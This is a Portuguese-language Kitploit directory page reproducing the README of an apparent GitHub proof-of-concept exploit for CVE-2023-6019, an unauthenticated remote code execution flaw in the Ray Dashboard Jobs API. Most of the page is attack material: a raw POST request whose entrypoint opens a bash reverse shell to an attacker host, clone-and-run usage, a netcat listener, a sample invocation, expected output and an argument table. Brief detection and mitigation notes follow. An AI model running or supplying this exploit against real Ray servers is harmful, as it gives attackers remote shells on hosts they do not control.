Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6019 — Exploit de PoC para CVE-2023-6019 - Execução Remota de Código via API de Jobs do Ray Dashboard não autenticada. | Kitploit
Ferramentas/GitHubGitHub/joaquinrrr/cve-2023-6019
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

Exploit de PoC para CVE-2023-6019 - Execução Remota de Código via API de Jobs do Ray Dashboard não autenticada.

Ver Repositório
6há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-6019 - Anyscale Ray Dashboard RCE não autenticado

PoC do exploit para CVE-2023-6019 — Execução Remota de Código via API de Jobs do Ray Dashboard sem autenticação.
Feito por oguiii


Descrição

O Anyscale Ray é uma framework open-source para cargas de trabalho distribuídas de ML/IA. As versões anteriores à 2.6.4 expõem uma API de submissão de Jobs através do Ray Dashboard (porta padrão 8265) sem qualquer autenticação, permitindo que um atacante não autenticado envie jobs arbitrários e obtenha Execução Remota de Código no host.

  • CVE: CVE-2023-6019
  • Gravidade: Crítica (CVSS 9.8)
  • Versões afetadas: Ray < 2.6.4
  • Corrigido em: Ray 2.6.4
  • Vetor de ataque: Rede (requisição HTTP não autenticada)

Como funciona

O endpoint /api/jobs/ aceita um payload JSON com um campo entrypoint que é executado como um comando shell pelo processo worker do Ray — sem necessidade de credenciais.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Uso

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <IP_ALVO> -p <PORTA> -l <LHOST> -lp <LPORT>

Argumentos

Exemplo

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Executar exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Saída esperada

root@kitploit:~
[*] Verificando versão do Ray em 192.168.1.100:8265...
[*] Versão da API Ray : 4
[*] Versão do Ray     : 2.6.3
[+] VULNERÁVEL! Ray 2.6.3 é afetado pelo CVE-2023-6019

[*] Alvo        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submetendo job...

[+] Job submetido com sucesso!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Certifique-se de que seu listener está pronto:
    nc -lvnp 4444

Detecção

Procure por requisições POST inesperadas para /api/jobs/ na porta 8265 em seus logs HTTP ou tráfego de rede.


Mitigação

  • Atualize para Ray >= 2.6.4
  • Restrinja o acesso à porta do Ray Dashboard (8265) através de regras de firewall
  • Não exponha o Ray Dashboard a redes públicas

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Aviso Legal

Esta ferramenta destina-se exclusivamente a testes de penetração autorizados e fins educacionais.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.
Sempre obtenha autorização escrita adequada antes de testar.

Baixar ferramenta
FlagDescriçãoPadrão
-tIP ou hostname do alvoobrigatório
-pPorta do Ray Dashboard8265
-lIP do atacante (reverse shell)obrigatório
-lpPorta do atacante (reverse shell)obrigatório